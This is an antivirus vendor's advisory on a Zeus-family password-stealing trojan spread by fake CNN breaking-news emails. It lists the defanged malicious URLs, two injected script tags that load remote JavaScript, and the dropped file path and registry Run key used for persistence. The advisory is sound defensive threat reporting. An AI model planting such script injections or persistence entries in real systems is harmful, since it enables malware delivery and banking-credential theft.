Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware
Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware
Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware
Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware

TROJANPWS.ZBOT - Fake CNN Breaking News Story

 

 

Name:

Trojan.PWS.Zbot.Gen

Descr. Added:

July 29, 2013

Type:

Trojan

Risk:

Low

Payload:

N/A

At risk systems:

Windows 95/98/ME/XP/NT/2003

 

 

Malware problems?   We can help.  Free Removal Tools.

 

 

Description:

 

The fake CNN Breaking News email arrives in a user inbox as the subject line, “Obama speech to urge ‘refocus’ on economy”.  The unsolicited email contains a forged email address appearing to be sent directly from CNN, and its body message contains embedded links that if clicked direct unknowing users to malicious web pages.

Sample email included below:

Obama Scam Detected and Blocked by Thirtyseven4 Endpoint Security


If the user clicks on one of the embedded links they will directed to a compromised website, such as: hxxp: //ekaterini.mainxx.gr/suggested/index.html

Once on this page, the viewed index.html target webpage will load two malicious javascripts:

1. <script type=”text / javascript” src=”hxxp: // ftp.thermovite.de/kxxile/teeniest.js”> </script>
 
2. <script type=”text / javascript” src=”hxxp:// traditionlagxxnresort.com/prodded/televised.js”></script>

By injecting the malicious javascript above, a cybercriminal can silently redirect the user’s browser to load content and malware from a remote server. In this case, a user will be prompted to download a fake Adobe Flash update.

If executed, it will drop a polymorphic file at the following location:
%appdata%\random_name_folder\random_name_file.exe

It will also add the following registry entry:
HCU\Software\Microsoft\Windows\CurrentVersion\Run
Random : "%appdata%\random_name_folder\random_name_file.exe

Users installing the update will inadvertently install a Trojan belonging to the Zeus malware family. The Zeus malware family is well-known for its ability to steal personal and banking information.Thirtyseven4 Antivirus detects this Trojan as ‘TrojanPWS.Zbot.gen’.

Please Note:
In addition to Thirtyseven4 Antivirus being up-to-date against this threat, Thirtyseven4 has also proactively blocked these targeted domains via our Browser Protection module.

For example:
ekaterini.mainxx.gr/suggested/index.html (as Blk/Domain.229144)
ftp.thermxxite.de/kurile/teeniest.js (as Blk/Domain.228948)
traditionlagoxxresort.com/prodded/televised.js (as Blk/Domain.228950)

 

Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware
Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware
Thirtyseven4 - Industry Leading Endpoint Security Solution

“Delight yourself in the Lord and he will give you the desires of your heart.” Psalm 37:4